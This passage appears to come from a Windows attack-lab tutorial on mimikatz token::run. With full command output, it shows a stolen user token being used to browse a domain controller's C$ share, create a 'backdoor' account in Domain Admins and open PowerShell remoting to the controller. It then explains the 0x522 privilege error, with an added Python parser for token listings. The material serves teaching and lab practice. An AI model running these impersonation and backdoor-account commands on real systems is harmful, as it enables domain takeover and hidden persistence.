/user: Execute the process with a token of this user (instead of specifying the token ID).
/process: The process to run. By default, the command whoami is executed.
Preparation
List the tokens of the user to impersonate using the token::list module:
mimikatz # token::list /user:ffast
Token Id : 0
User name : ffast
SID name :
5332 {0;000563b2} 2 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
4432 {0;000563b2} 2 F 2839551 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
668 {0;00050574} 0 D 329079 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (12g,24p) Impersonation (Impersonation)
668 {0;000563e4} 2 L 353269 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
800 {0;000563e4} 2 L 456098 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
920 {0;000563e4} 2 L 380750 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
920 {0;000563e4} 2 L 387116 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,01p) Impersonation (Identification)
920 {0;000563e4} 2 L 436160 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
[...]
id
Run a command using a specified token by its token ID. By default, the command whoami is executed:
mimikatz # token::run /id:457263
Token Id : 457263
User name :
SID name :
676 {0;000f0ac5} 3 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
winattacklab\ffast
user
Run a command using a specified token by its username. The domain name must not be specified. By default, the command whoami is executed:
mimikatz # token::run /user:ffast
Token Id : 457263
User name :
SID name :
676 {0;000f0ac5} 3 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
winattacklab\ffast
process
A different process to spawn can be specified with /process.
Example: accessing the system drive of the domain controller:
mimikatz # token::run /id:1075487 /process:"cmd.exe /c dir \\dc1\c$"
Token Id : 1075487
User name :
SID name :
7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
Volume in drive \\dc1\c$ is Windows
Volume Serial Number is 6A6C-0DE3
Directory of \\dc1\c$
05/31/2023 06:30 AM <DIR> AzureData
05/31/2023 07:09 AM <DIR> ddns_server
05/31/2023 07:04 AM <DIR> inetpub
05/31/2023 06:46 AM <DIR> Packages
05/05/2023 11:31 AM <DIR> PerfLogs
05/31/2023 07:04 AM <DIR> Program Files
05/05/2023 12:26 PM <DIR> Program Files (x86)
05/31/2023 07:10 AM <DIR> terraform
05/31/2023 07:06 AM <DIR> Users
05/31/2023 07:05 AM <DIR> Windows
05/31/2023 06:33 AM <DIR> WindowsAzure
05/31/2023 07:07 AM <DIR> WSUS
0 File(s) 0 bytes
12 Dir(s) 15,918,473,216 bytes free
Add backdoor user:
mimikatz # token::run /id:1075487 /process:"cmd.exe /c net user backdoor Password.123 /add /domain && net group \"Domain Admins\" backdoor /add /domain && net user backdoor /domain"
Token Id : 1075487
User name :
SID name :
7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
The request will be processed at a domain controller for domain winattacklab.local.
The command completed successfully.
The request will be processed at a domain controller for domain winattacklab.local.
The command completed successfully.
The request will be processed at a domain controller for domain winattacklab.local.
User name backdoor
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2023 3:59:27 PM
Password expires Never
Password changeable 6/20/2023 3:59:27 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Admins *Domain Users
The command completed successfully.
It's not possible to directly start a new interactive PowerShell process, because the user input of a new process is somehow not handled correctly. However, when PowerShell is started via PsExec, it can be interactively used:
mimikatz # token::run /id:77132228 /process:"C:\tools\PsExec64.exe -accepteula -i powershell.exe"
Token Id : 77132228
User name :
SID name :
8544 {0;0498f042} 2 L 77132228 child\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,05p) Primary
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
A new PowerShell window is then opened which can be used interactively:
PS C:\Windows\system32> whoami
winattacklab\ffast
PS C:\Windows\system32> Enter-PSSession DC1
[DC1]: PS C:\Users\ffast\Documents> hostname
DC1
[DC1]: PS C:\Users\ffast\Documents> whoami
winattacklab\ffast
[DC1]: PS C:\Users\ffast\Documents> ls \
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/31/2023 6:30 AM AzureData
d----- 5/31/2023 7:09 AM ddns_server
d----- 5/31/2023 7:04 AM inetpub
d----- 5/31/2023 6:46 AM Packages
d----- 5/5/2023 11:31 AM PerfLogs
d-r--- 5/31/2023 7:04 AM Program Files
d----- 5/5/2023 12:26 PM Program Files (x86)
d----- 5/31/2023 7:10 AM terraform
d-r--- 6/22/2023 1:02 PM Users
d-r--- 6/20/2023 5:27 PM Windows
d----- 5/31/2023 6:33 AM WindowsAzure
d----- 5/31/2023 7:07 AM WSUS
Demystifying the kull_m_process_run_data Error
Even as a local administrator, you can get the kull_m_process_run_data error:
mimikatz # token::run /id:1075487 /process:whoami.exe
Token Id : 1075487
User name :
SID name :
7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522)
The error message says that the call to the CreateProcessAsUser function failed.
The token::run command uses the function CreateProcessAsUser to create a new process in the security context of the specified token and requires the following privileges (source: CreateProcessAsUserA function (processthreadsapi.h)):
SeIncreaseQuotaPrivilege privilege
SeAssignPrimaryTokenPrivilege privilege (if the token is not assignable)
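To make the token::list rows from the Preparation section and the kull_m_process_run_data error line easier to triage, here is an added Python example (it is neither mimikatz code nor part of the original page). It parses the list rows into records, groups the primary tokens per account, decodes the hexadecimal Win32 error code printed after CreateProcessAsUser, and reports which of the two privileges named above are not held. The column meaning is my reading of the output shown on this page and is an assumption: PID, {logon session LUID}, terminal session, elevation-type letter (D = Default, F = Full, L = Limited), token ID, account, SID, (group count g, privilege count p), token type and, for impersonation tokens, the impersonation level. The sample rows are constructed from the page's lab output.

```python
"""Triage helpers for mimikatz token::list rows and the token::run error line.

Added example, not part of mimikatz or of the original page. Column meaning
is an assumption derived from the output shown on the page (see lead-in).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the page's format: two filter header lines,
# three token rows and the "[...]" truncation marker.
SAMPLE_TOKEN_LIST = """\
Token Id : 0
User name : ffast
SID name :
5332 {0;000563b2} 2 F 457263 winattacklab\\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
668 {0;00050574} 0 D 329079 winattacklab\\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (12g,24p) Impersonation (Impersonation)
920 {0;000563e4} 2 L 387116 winattacklab\\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,01p) Impersonation (Identification)
[...]
"""

# Assumed column layout: PID {LUID} session elevation-letter tokenId account SID (Ng,Mp) type [(level)]
ROW_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+\{(?P<luid_hi>\d+);(?P<luid_lo>[0-9a-fA-F]+)\}\s+"
    r"(?P<session>\d+)\s+(?P<elev>[DFL])\s+(?P<token_id>\d+)\s+"
    r"(?P<account>\S+)\s+(?P<sid>S-1-[0-9-]+)\s+"
    r"\((?P<groups>\d+)g,(?P<privs>\d+)p\)\s+"
    r"(?P<kind>Primary|Impersonation)(?:\s+\((?P<level>\w+)\))?\s*$"
)
ELEVATION = {"D": "Default", "F": "Full", "L": "Limited"}  # assumed mapping


@dataclass(frozen=True)
class TokenRow:
    pid: int
    logon_session: str          # "{hi;lo}" exactly as printed
    session: int
    elevation: str
    token_id: int               # the value passed to token::run /id:
    account: str
    sid: str
    groups: int
    privileges: int
    kind: str                   # "Primary" or "Impersonation"
    impersonation_level: Optional[str]


def parse_token_list(text: str) -> List[TokenRow]:
    """Parse every row that matches the assumed layout; header/marker lines are skipped."""
    rows: List[TokenRow] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        rows.append(TokenRow(
            pid=int(m["pid"]),
            logon_session=f"{{{m['luid_hi']};{m['luid_lo'].lower()}}}",
            session=int(m["session"]),
            elevation=ELEVATION[m["elev"]],
            token_id=int(m["token_id"]),
            account=m["account"],
            sid=m["sid"],
            groups=int(m["groups"]),
            privileges=int(m["privs"]),
            kind=m["kind"],
            impersonation_level=m["level"],
        ))
    return rows


def primary_tokens_by_account(rows: List[TokenRow]) -> Dict[str, List[Tuple[int, int]]]:
    """Inventory of (pid, token_id) pairs holding a primary token, per account.

    For incident response this shows which processes expose a given account's
    primary token on the host, i.e. what a caller with the required privileges
    could hand to CreateProcessAsUser."""
    out: Dict[str, List[Tuple[int, int]]] = {}
    for r in rows:
        if r.kind == "Primary":
            out.setdefault(r.account, []).append((r.pid, r.token_id))
    return out


# Win32 error codes as printed in hex by mimikatz; 0x522 = 1314 = ERROR_PRIVILEGE_NOT_HELD.
WIN32_ERRORS = {
    0x2: "ERROR_FILE_NOT_FOUND",
    0x5: "ERROR_ACCESS_DENIED",
    0x57: "ERROR_INVALID_PARAMETER",
    0x522: "ERROR_PRIVILEGE_NOT_HELD",
}
ERROR_RE = re.compile(r"ERROR kull_m_process_run_data ; (?P<api>\w+) \((?P<code>0x[0-9a-fA-F]+)\)")


def decode_run_error(line: str) -> Optional[Tuple[str, int, str]]:
    """Return (failing API, decimal error code, symbolic name) for a token::run error line."""
    m = ERROR_RE.search(line)
    if not m:
        return None
    code = int(m["code"], 16)
    return m["api"], code, WIN32_ERRORS.get(code, "unknown")


# Privileges the page lists as required for CreateProcessAsUser.
REQUIRED_FOR_CREATEPROCESSASUSER = ("SeIncreaseQuotaPrivilege", "SeAssignPrimaryTokenPrivilege")


def missing_privileges(held) -> List[str]:
    """Which of the required privileges are absent from the caller's privilege set."""
    return [p for p in REQUIRED_FOR_CREATEPROCESSASUSER if p not in set(held)]


if __name__ == "__main__":
    for acct, pairs in primary_tokens_by_account(parse_token_list(SAMPLE_TOKEN_LIST)).items():
        print(acct, pairs)
    print(decode_run_error("ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522)"))
    print(missing_privileges({"SeIncreaseQuotaPrivilege"}))
```

Feed it the privilege names from a `whoami /priv` listing (as a set) to see at a glance that a local administrator who holds only SeIncreaseQuotaPrivilege is still missing SeAssignPrimaryTokenPrivilege, which is what the 0x522 code expresses.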
A local admin has the permission to get the SeIncreaseQuotaPrivilege privilege but not the SeAssignPrimaryTokenPrivilege privilege: